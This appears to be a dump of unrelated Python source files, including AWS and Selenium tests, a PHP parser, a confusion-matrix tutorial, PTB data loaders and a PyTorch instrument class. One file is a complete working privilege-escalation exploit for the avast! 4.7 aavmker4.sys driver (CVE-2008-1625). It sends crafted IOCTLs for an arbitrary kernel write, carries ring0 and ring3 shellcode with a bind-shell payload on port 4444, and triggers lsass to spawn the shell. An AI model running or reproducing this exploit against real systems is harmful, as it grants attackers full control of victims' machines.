JSONLike = Dict[str, _JSONType]
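# For illustration: {"name": "agent-0", "port": 9000, "tags": ["a", "b"], "extra": None}
# is a valid JSONLike value (string keys mapping to primitives, nested dicts/lists, or None).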
PathLike = Union[os.PathLike, Path, str]
|
py | b40353e66d80eccc848d359f7f82e63c44bae1e3 | """ Unit test for the AWS lib """
import json
from unittest.mock import patch
import voithos.lib.config
import voithos.lib.aws.aws as aws
@patch("voithos.lib.config.system")
def test_get_aws_iam(mock_system):
""" get_aws_iam returns a dict with id and secret """
config = voithos.lib.config.DEFAULT_CONFIG
config["license"] = "11111111111111111111-2222222222222222222222222222222222222222"
mock_system.get_file_contents.return_value = json.dumps(config)
iam = aws.get_aws_iam()
assert "id" in iam
assert "secret" in iam
assert isinstance(iam, dict)
|
py | b403544b58b5219d2b12b894ea5c669a93f36954 | # Copyright (C) 2007 Frederic Back ([email protected])
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307, USA.
import gtk
import gobject
from parser_cstyle import Token, CStyleCodeParser
import re
e = r".*?" # anything, but *not greedy*
e+= "(?:(private|protected) +)?" # visibility
e+= "function +(\w+)(\(.*\))" # function declaration
e+= " *\{$" # the tail
RE_FUNCTION = re.compile(e)
RE_CLASS = re.compile(r".*class +(\w+)(?: +extends +(\w+))? *\{$")
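# For illustration, RE_FUNCTION matches lines such as "private function foo($bar) {"
# (capturing visibility, name and params), and RE_CLASS matches "class Foo extends Bar {".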
class PHPParser( CStyleCodeParser ):
def __init__(self):
pass
def getTokenFromChunk(self, chunk):
if chunk.find("function")>-1 or chunk.find("class")>-1:
# third step: perform regular expression to get a token
match = re.match(RE_FUNCTION,chunk)
if match:
t = Token("function")
t.visibility, t.name, t.params = match.groups()
#print match.groups()
return t
else:
match = re.match(RE_CLASS,chunk)
if match:
t = Token("class")
t.name, t.params = match.groups()
return t
else:
# last step: alert user if a chunk could not be parsed
#print "Could not resolve PHP function or class in the following string:"
#print chunk
pass
return None
|
py | b403544fd06f23234fca5a1e5a99db6d6f5b1ae7 | __author__ = "xTrinch"
__email__ = "[email protected]"
__version__ = "0.3.2"
class NotificationError(Exception):
pass
default_app_config = 'fcm_django.apps.FcmDjangoConfig'
|
py | b4035520074b12c1d760e163ef8a9de9c6e45527 | from typing import *
from onlinejudge_template.generator._utils import get_analyzed
def is_topcoder(data: Dict[str, Any]) -> bool:
definition = get_analyzed(data).topcoder_class_definition
return definition is not None
def class_name(data: Dict[str, Any]) -> str:
definition = get_analyzed(data).topcoder_class_definition
if definition is None:
return 'theClassName'
return definition.class_name
def method_name(data: Dict[str, Any]) -> str:
definition = get_analyzed(data).topcoder_class_definition
if definition is None:
return 'theMethodName'
return definition.method_name
|
py | b40356005b7a0329261c8d3e5831e0248321c3ed | import streamlit as st
#st.title("The code")
md = """
Doing all work by hand is wasteful. Let's put everything in vectors and use python libraries!
```python
true_condition = [0, 0, 0, 1, 0, 0, 1, 1, 1, 0]
pred_condition = [0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
```
As you can see, person `i` was predicted as `pred_condition[i]`,
but in reality we observed `true_condition[i]`.
We can automate the counting process with the following code:
```python
from sklearn.metrics import confusion_matrix
CM = confusion_matrix(true_condition, pred_condition)
```
Obtaining:
"""
st.markdown(md, unsafe_allow_html=True)
true_condition = [0, 0, 0, 1, 0, 0, 1, 1, 1, 0]
pred_condition = [0, 0, 1, 0, 0, 1, 0, 0, 1, 0]
from sklearn.metrics import confusion_matrix
CM = confusion_matrix(true_condition, pred_condition)
st.write(CM)
md = """
Sometimes people unwrap the values as follows
```python
from sklearn.metrics import confusion_matrix
TN, FP, FN, TP = confusion_matrix(true_condition, pred_condition).ravel()
```
So we obtain:
"""
st.markdown(md, unsafe_allow_html=True)
from sklearn.metrics import confusion_matrix
TN, FP, FN, TP = confusion_matrix(true_condition, pred_condition).ravel()
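# For these example vectors, sklearn lays the matrix out with true labels as rows and
# predictions as columns, so ravel() yields TN=4, FP=2, FN=3, TP=1.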
st.code(f"True Negatives, TN = {TN} \nFalse Positives, FP = {FP}\nFalse Negatives, FN = {FN}\nTrue Positives, TP = {TP}") |
py | b4035696eb863d3c0db871e1b1f476143dd86d80 | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
class DischargeRequiredError(Exception):
''' Raised by checker when authorization has failed and a discharged
macaroon might fix it.
A caller should grant the user the ability to authorize by minting a
macaroon associated with Ops (see MacaroonStore.MacaroonIdInfo for
how the associated operations are retrieved) and adding Caveats. If
the user succeeds in discharging the caveats, the authorization will
be granted.
'''
def __init__(self, msg, ops, cavs):
'''
:param msg: holds some reason why the authorization was denied.
:param ops: holds all the operations that were not authorized.
If ops contains a single LOGIN_OP member, the macaroon
should be treated as an login token. Login tokens (also
known as authentication macaroons) usually have a longer
life span than other macaroons.
:param cavs: holds the caveats that must be added to macaroons that
authorize the above operations.
'''
super(DischargeRequiredError, self).__init__(msg)
self._ops = ops
self._cavs = cavs
def ops(self):
return self._ops
def cavs(self):
return self._cavs
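# Illustrative sketch only (LOGIN_OP and caveat are placeholder names on the caller's side):
#   raise DischargeRequiredError('discharge required', ops=[LOGIN_OP], cavs=[caveat])
# The caller then mints a macaroon for `ops` carrying `cavs` and retries once it is discharged.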
class PermissionDenied(Exception):
'''Raised from AuthChecker when permission has been denied.
'''
pass
class CaveatNotRecognizedError(Exception):
'''Containing the cause of errors returned from caveat checkers when the
caveat was not recognized.
'''
pass
class VerificationError(Exception):
'''Raised to signify that an error is because of a verification failure
rather than because verification could not be done.'''
pass
class AuthInitError(Exception):
'''Raised if AuthChecker cannot be initialized properly.'''
pass
class IdentityError(Exception):
''' Raised from IdentityClient.declared_identity when an error occurs.
'''
pass
class ThirdPartyCaveatCheckFailed(Exception):
''' Raised from ThirdPartyCaveatChecker.check_third_party when check fails.
'''
pass
class ThirdPartyInfoNotFound(Exception):
''' Raised from implementation of ThirdPartyLocator.third_party_info when
the info cannot be found.
'''
pass
|
py | b403570558a6eb6dffd5f0fe78ef33fdc34e9f38 | from abc import ABC
from abc import abstractmethod
from typing import List
from typing import Optional
from typing import TypeVar
from typing import no_type_check
import torch
from torch import Tensor
T = TypeVar("T", bound="BaseInstrument")
class BaseInstrument(ABC):
"""Base class for all financial instruments."""
cost: float
@property
@abstractmethod
def spot(self) -> Tensor:
"""Returns the spot price of self."""
@abstractmethod
@no_type_check
def simulate(self, n_paths: int, time_horizon: float, **kwargs) -> None:
"""Simulate time series associated with the instrument itself
(for a primary instrument) or its underlier (for a derivative)
and add them as buffers.
Args:
n_paths (int): The number of paths to simulate.
time_horizon (float): The period of time to simulate the price.
Returns:
None
"""
@abstractmethod
def to(self: T, *args, **kwargs) -> T:
"""Moves and/or casts the buffers of the instrument.
This can be called as
.. function:: to(device=None, dtype=None)
.. function:: to(tensor)
.. function:: to(instrument)
Its signature is similar to :meth:`torch.nn.Module.to`.
It only accepts floating point dtypes.
See :ref:`instrument-attributes-doc` for details.
Note:
This method modifies the instrument in-place.
.. seealso::
- :meth:`float()`: Cast to :class:`torch.float32`.
- :meth:`double()`: Cast to :class:`torch.float64`.
- :meth:`half()`: Cast to :class:`torch.float16`.
- :meth:`bfloat16()`: Cast to :class:`torch.bfloat16`.
- :meth:`cuda()`: Move to CUDA memory.
- :meth:`cpu()`: Move to CPU memory.
Args:
dtype (torch.dtype): The desired floating point dtype of
the buffers in this instrument.
device (torch.device): The desired device of
the buffers in this instrument.
tensor (torch.Tensor): Tensor whose dtype and device are
the desired dtype and device of
the buffers in this instrument.
instrument (BaseInstrument): Instrument whose dtype and device are
the desired dtype and device of
the buffers in this instrument.
Returns:
self
"""
def cpu(self: T) -> T:
"""Moves all buffers of this instrument and its underlier to the CPU.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.device("cpu"))
def cuda(self: T, device: Optional[int] = None) -> T:
"""Moves all buffers of this instrument and its underlier to the GPU.
Note:
This method modifies the instrument in-place.
Args:
device (int, optional): If specified,
all buffers will be copied to that device.
Returns:
self
"""
return self.to(torch.device(f"cuda:{device}" if device is not None else "cuda"))
def double(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float64`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float64)
def float(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float32`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float32)
def half(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.float16`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.float16)
def bfloat16(self: T) -> T:
"""Casts all floating point parameters and buffers to
``torch.bfloat16`` datatype.
Note:
This method modifies the instrument in-place.
Returns:
self
"""
return self.to(torch.bfloat16)
def extra_repr(self) -> str:
"""Set the extra representation of the instrument.
To print customized extra information,
you should re-implement this method in your own instruments.
Both single-line and multi-line strings are acceptable.
"""
return ""
def _get_name(self) -> str:
return self.__class__.__name__
def _dinfo(self) -> List[str]:
# Returns list of strings that tell ``dtype`` and ``device`` of self.
# Intended to be used in :func:`__repr__`.
# If ``dtype`` (``device``) is the one specified in default type,
# ``dinfo`` will not have the information of it.
# Implementation here refers to the function _str_intern in
# pytorch/_tensor_str.py.
dinfo = []
dtype = getattr(self, "dtype", None)
if dtype is not None:
if dtype != torch.get_default_dtype():
dinfo.append("dtype=" + str(dtype))
# A general logic here is we only print device when it doesn't match
# the device specified in default tensor type.
device = getattr(self, "device", None)
if device is not None:
if device.type != torch._C._get_default_device() or (
device.type == "cuda" and torch.cuda.current_device() != device.index
):
dinfo.append("device='" + str(device) + "'")
return dinfo
class Instrument(BaseInstrument):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
raise DeprecationWarning(
"Instrument is deprecated. Use BaseInstrument instead."
)
|
py | b40357bbea84ed347aecb4c2b9f30879988a488b | __all__ = ["handler"]
import json
import os
import boto3
from ssm_ps_demo import logger
try:
_STORE_FN_ARN = os.environ["STORE_FN_ARN"]
except KeyError:
logger.exception("Store function ARN is required.")
def handler(*_) -> None:
"""Call the store function to get parameter values."""
client = boto3.client("lambda")
invoke_response = client.invoke(
FunctionName=_STORE_FN_ARN,
InvocationType="RequestResponse",
Payload=json.dumps(["DB_HOST", "DB_PORT"]),
)
payload = invoke_response["Payload"]
raw = payload.read()
decoded = raw.decode("utf-8")
parameters = json.loads(decoded)
logger.info("Parameters: {}".format(json.dumps(parameters)))
|
py | b40358189d7a59fe4851ad26406ed0d7f01be229 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Operation(Model):
"""Network REST API operation definition.
:param name: Operation name: {provider}/{resource}/{operation}
:type name: str
:param display: Display metadata associated with the operation.
:type display: ~azure.mgmt.network.v2018_10_01.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param service_specification: Specification of the service.
:type service_specification:
~azure.mgmt.network.v2018_10_01.models.OperationPropertiesFormatServiceSpecification
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'service_specification': {'key': 'properties.serviceSpecification', 'type': 'OperationPropertiesFormatServiceSpecification'},
}
def __init__(self, **kwargs):
super(Operation, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.service_specification = kwargs.get('service_specification', None)
|
py | b40359a0a31e0d8cba26d7129e52d00fb090aef4 | import numpy as np
from .mass import kg
from .length import m
from .time_units import s
from .electromagnetic import C
# SI
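# np.logspace(-3, 3, 3) yields (1e-3, 1, 1e3) and np.logspace(3, 12, 4) yields
# (1e3, 1e6, 1e9, 1e12), so the definitions below are the usual milli/kilo multiples
# of the joule and the keV/MeV/GeV/TeV multiples of the electronvolt.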
mJ, J, kJ = np.logspace(-3, 3, 3) * (kg * m ** 2 / s ** 2)
eV = 1.602176634e-19 * C
meV = 1e-3 * eV
keV, MeV, GeV, TeV = eV * np.logspace(3, 12, 4)
|
py | b4035a22db265103a1aff95c487cfd0a683f3d79 | #!/usr/bin/python
# avast! 4.7 aavmker4.sys privilege escalation
# http://www.trapkit.de/advisories/TKADV2008-002.txt
# CVE-2008-1625
# Tested on WindXpSp2/Sp3 Dep ON
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 17/04/2010
# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0
from ctypes import *
import time, struct, sys, thread, os
kernel32 = windll.kernel32
Psapi = windll.Psapi
def findSysBase(drv):
print "(+) Retrieving %s base address..." % drv
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drivername.value.lower() == drv:
print "(+) Address retrieved: %s" % hex(baseaddy)
return baseaddy
return None
def checkShell():
check = "netstat -an | find \"4444\""
res = os.popen(check)
ret = res.read()
res.close()
if ret.find("0.0.0.0:4444") != -1:
return True
else:
return False
def kickLsass():
time.sleep(10)
lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"
lsas2 = "net use \\\\127.0.0.1 /user:administrator test > NUL"
nc = "nc 127.0.0.1 4444"
print "(!) NO BSOD? good sign :)"
print "(*) Sleeping 60 secs before the Woshi finger hold..."
time.sleep(60)
# Trying to kick ls-ass, any auth good or failed should help
# if this doesn't work for you try to rdp to the vuln box or
# logout/login from console... it's rough but should work ;)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
while 1:
res = checkShell()
if res:
print "($) Shell is ready 0.0.0.0:4444"
#os.system(nc)
#print "(-) netcat not in path but shell is open!"
break
print "(*) Retrying. Sleeping 30 secs..."
time.sleep(30)
print "(+) Trying to fail an auth to trigger syscall..."
os.system(lsas1)
time.sleep(1)
os.system(lsas2)
def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output,
out_size, dwReturn1):
# We trigger func pointer to control EIP
time.sleep(5)
print "(+) Owning EIP..."
for i in range(1,3):
print "(+) Triggering function pointer: %d/2" % i
dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
time.sleep(0.5)
if __name__ == '__main__':
print "(*) avast! 4.7 aavmker4.sys privilege escalation"
print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com"
print "(+) www.offsec.com || Spaghetti & Pwnsauce"
print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
IOCTL_STOR = 0xb2d6001c # stores stuff to bypass checks in .data
IOCTL_VULN = 0xb2d60030 # writes to arbitrary memory
IOCTL_EIP = 0xb2d60020 # triggers function pointer to own EIP
# DosDevices\AAVMKER4 Device\AavmKer4
DEVICE_NAME = "\\\\.\\AavmKer4"
dwReturn1 = c_ulong()
dwReturn2 = c_ulong()
evil_size = 0x878
out_size = 0x1024
stor_size = 0x418
evil_output = ""
stor_output = ""
driver_name = 'aavmker4.sys'
# evil_input = 0x878
# Payload = 496 bytes
# ring0_migrate = 45 bytes || # \xf0\x01 bytes to copy
ring0_migrate = (
"\xfc\xfa\xeb\x24\x5e\x68\x76\x01\x00\x00\x59\x0f\x32\x89\x86\x69"
"\x00\x00\x00\x8b\xbe\x6d\x00\x00\x00\x89\xf8\x0f\x30\xb9\xf0\x01"
"\x00\x00\xf3\xa4\xfb\xf4\xeb\xfd\xe8\xd7\xff\xff\xff" )
# ring0_msr = 117 bytes
ring0_msr = (
"\x6a\x00\x9c\x60\xe8\x00\x00\x00\x00\x58\x8b\x98\x60\x00\x00\x00"
"\x89\x5c\x24\x24\x81\xf9\xde\xc0\xad\xde\x75\x10\x68\x76\x01\x00"
"\x00\x59\x89\xd8\x31\xd2\x0f\x30\x31\xc0\xeb\x3a\x8b\x32\x0f\xb6"
"\x1e\x66\x81\xfb\xc3\x00\x75\x2e\x8b\x98\x68\x00\x00\x00\x8d\x9b"
"\x75\x00\x00\x00\x89\x1a\xb8\x01\x00\x00\x80\x0f\xa2\x81\xe2\x00"
"\x00\x10\x00\x74\x11\xba\x00\xff\x3f\xc0\x81\xc2\x04\x00\x00\x00"
"\x81\x22\xff\xff\xff\x7f\x61\x9d\xc3\xff\xff\xff\xff\x00\x04\xdf"
"\xff\x00\x04\xfe\x7f" )
# ring3_stager = 61 bytes
ring3_stager = (
"\x60\x6a\x30\x58\x99\x64\x8b\x18\x39\x53\x0c\x74\x2e\x8b\x43\x10"
"\x8b\x40\x3c\x83\xc0\x28\x8b\x08\x03\x48\x03\x81\xf9\x6c\x61\x73"
"\x73\x75\x18\xe8\x0a\x00\x00\x00\xe8\x10\x00\x00\x00\xe9\x09\x00"
"\x00\x00\xb9\xde\xc0\xad\xde\x89\xe2\x0f\x34\x61\xc3" )
# msf payload: bindshell port 4444 318 bytes
ring3_shellcode = (
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0\xc3" )
sysbase = findSysBase(driver_name)
if not sysbase:
print "(-) Couldn't retrieve driver base address, exiting..."
sys.exit()
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
# .data memory area we write to; offset from base = 0x2e04
read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data
# r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop
r0_address = struct.pack('L', sysbase+0x23fa)
evil_input = r0_address*2 + "\x90"*0x102
evil_input += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode
evil_input += "\x41"*0x549
evil_input += read_data_from + "\x42\x42\x42\x42" # bypass input checks
stor_input = "\x43\x43\x43\x43" # padding
stor_input += "\x07\xAD\xDE\xD0" # cmp dword ptr [eax], 0D0DEAD07h
stor_input += "\xBA\xD0\xBA\x10" # cmp dword ptr [eax+4], 10BAD0BAh
stor_input += "\x44\x44\x44\x44"*2
# After arbitrary write to memory nt!KeSetEvent is called: we need to fix
# nt!KeSetEvent+0x32 using any addy pointing to value different to 0x01
# so we can use our "read_data_from" again.
stor_input += read_data_from
stor_input += "\x44\x44\x44\x44"
# 0x2300 offset from base: we write here to control a function pointer
# and own EIP
stor_input += struct.pack('L', sysbase+0x2300) + "\x45"*414
# trigger these later on...
thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size,
stor_output, out_size, dwReturn1))
thread.start_new(kickLsass, ())
###########################################################################
# And now let's own the boy:
if driver_handle1:
# We store values to overcome input checks
print "(+) Storing our precious in kernel space ;) ..."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
# We trigger arbitrary write
print "(*) Sending evil IOCTL..."
print "(+) Pwnage in progress...."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN,
evil_input, evil_size, evil_output,
evil_size,
byref(dwReturn2), None)
|
py | b4035a23b94f39666a6723711e3fb9520e08101e |
"""Utilities for parsing PTB text files."""
import collections
import os
import tensorflow as tf
def _read_words(filename):
with tf.gfile.GFile(filename, "rb") as f:
return list(f.read())
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data if word in word_to_id]
def ptb_raw_data(data_path=None):
"""Load PTB raw data from data directory "data_path".
Reads PTB text files, converts strings to integer ids,
and performs mini-batching of the inputs.
The PTB dataset comes from Tomas Mikolov's webpage:
http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
Args:
data_path: string path to the directory where simple-examples.tgz has
been extracted.
Returns:
tuple (train_data, valid_data, test_data, vocabulary)
where each of the data objects can be passed to PTBIterator.
"""
train_path = os.path.join(data_path, 'train')
valid_path = os.path.join(data_path, 'valid')
test_path = os.path.join(data_path, 'test')
word_to_id = _build_vocab(train_path)
print('vocabulary size:', len(word_to_id))
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
vocabulary = len(word_to_id)
print('data loaded')
return train_data, valid_data, test_data, vocabulary
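# Usage sketch (illustrative; assumes data_path holds the extracted 'train', 'valid'
# and 'test' files):
#   train_data, valid_data, test_data, vocab = ptb_raw_data('/path/to/data')
#   x, y = ptb_producer(train_data, batch_size=20, num_steps=35)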
def ptb_producer(raw_data, batch_size, num_steps, name=None):
"""Iterate on the raw PTB data.
This chunks up raw_data into batches of examples and returns Tensors that
are drawn from these batches.
Args:
raw_data: one of the raw data outputs from ptb_raw_data.
batch_size: int, the batch size.
num_steps: int, the number of unrolls.
name: the name of this operation (optional).
Returns:
A pair of Tensors, each shaped [batch_size, num_steps]. The second element
of the tuple is the same data time-shifted to the right by one.
Raises:
tf.errors.InvalidArgumentError: if batch_size or num_steps are too high.
"""
with tf.name_scope(name, "PTBProducer", [raw_data, batch_size, num_steps]):
raw_data = tf.convert_to_tensor(raw_data, name="raw_data", dtype=tf.int32)
data_len = tf.size(raw_data)
batch_len = data_len // batch_size
data = tf.reshape(raw_data[0 : batch_size * batch_len],
[batch_size, batch_len])
epoch_size = (batch_len - 1) // num_steps
assertion = tf.assert_positive(
epoch_size,
message="epoch_size == 0, decrease batch_size or num_steps")
with tf.control_dependencies([assertion]):
epoch_size = tf.identity(epoch_size, name="epoch_size")
i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()
x = tf.slice(data, [0, i * num_steps], [batch_size, num_steps])
y = tf.slice(data, [0, i * num_steps + 1], [batch_size, num_steps])
return x, y |
py | b4035b1046f9b45afd97ae261ae793ebcf5189ca | import os
import sys
import numpy as np
import re
# 3 seconds
chr_all=['chr1','chr2','chr3','chr4','chr5','chr6','chr7','chr8','chr9','chr10','chr11','chr12','chr13','chr14','chr15','chr16','chr17','chr18','chr19','chr20','chr21','chr22','chrX']
tmp=[248956422,242193529,198295559,190214555,181538259,170805979,159345973,145138636,138394717,133797422,135086622,133275309,114364328,107043718,101991189,90338345,83257441,80373285,58617616,64444167,46709983,50818468,156040895]
chr_len={}
for i in np.arange(len(chr_all)):
chr_len[chr_all[i]]=tmp[i]
step_size=1000 # subsample ratio
sample_len=np.ceil(np.array(tmp)/step_size).astype(int)
path1='./sample_for_anchor_final/'
path2='./sample_for_anchor_final/'
os.system('mkdir -p ' + path2)
assay_all=['M01','M02','M16','M17','M18','M20','M22','M29']
for the_assay in assay_all:
ref=np.zeros(sum(sample_len))
count=0.0
for i in np.arange(1,52):
the_cell='C' + '%02d' % i
the_id = the_cell + the_assay
if os.path.isfile(path1 + 'sample_' + the_id + '.npy'):
print(the_id)
ref = ref + np.load(path1 + 'sample_' + the_id + '.npy')
count+=1.0
ref = ref/count
np.save(path2 + 'ref_' + the_assay, ref)
|
py | b4035be9470e546cdef014ac505da115f146eaed | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# Default interval in seconds between calls
# This is used both in the work.transports.TransportQueue and in the
# transport.Transport class
# (unless replaced in plugins, as it actually is the case for SSH and local)
DEFAULT_TRANSPORT_INTERVAL = 30. |
py | b4035e3e4bf4f1a8e2634918ff3b4aa798607e7f | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy import Field
class TaudemItem(scrapy.Item):
name = Field()
description = Field()
usage = Field()
syntax = Field()
parameters = Field()
options = Field()
manual_url = Field()
# category = Field()
pass
|
py | b4035f6fa316e307d0ced461f0b1c161d8a50425 | from django.contrib import admin
class CommonAdmin(admin.ModelAdmin):
list_per_page = 20
list_select_related = True
|
py | b4035f766626a5a33ed6b63a047842dd3df0dd4d | class PhaseThreeKey:
def __init__(self, corner_encoding, edge_encoding, parity):
self.corner_encoding = corner_encoding
self.edge_encoding = edge_encoding
self.parity = parity
def __eq__(self, other):
return self.corner_encoding == other.corner_encoding and self.edge_encoding == other.edge_encoding and self.parity == other.parity
def __hash__(self):
c_result = 0
for corner_code in self.corner_encoding:
c_result = 31 * c_result + corner_code
e_result = 0
for edge_code in self.edge_encoding:
e_result = 31 * e_result + edge_code
result = c_result
result = 31 * result + e_result
result = 31 * result + hash(self.parity)
return result
def __str__(self):
return "PhaseThreeKey(corners={}, edges={}, parity={})".format(self.corner_encoding, self.edge_encoding, self.parity)
|
py | b4035fc013a5194eed2997e197fe9397a8ffb8a3 | # -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
import time, unittest
def is_alert_present(wd):
try:
wd.switch_to_alert().text
return True
except:
return False
class test_add_group(unittest.TestCase):
def setUp(self):
self.wd = WebDriver()
self.wd.implicitly_wait(60)
def test_test_add_group(self):
success = True
wd = self.wd
wd.get("http://localhost/addressbook/group.php")
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys("admin")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys("secret")
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("Grupa 1")
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys("Nowa Grupa 1")
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys("Nowa Grupa 1")
wd.find_element_by_name("submit").click()
wd.find_element_by_link_text("group page").click()
wd.find_element_by_link_text("Logout").click()
self.assertTrue(success)
def tearDown(self):
self.wd.quit()
if __name__ == '__main__':
unittest.main()
|
py | b4035ff145944fd60dcab32d6dd5f967b7c1871e | '''
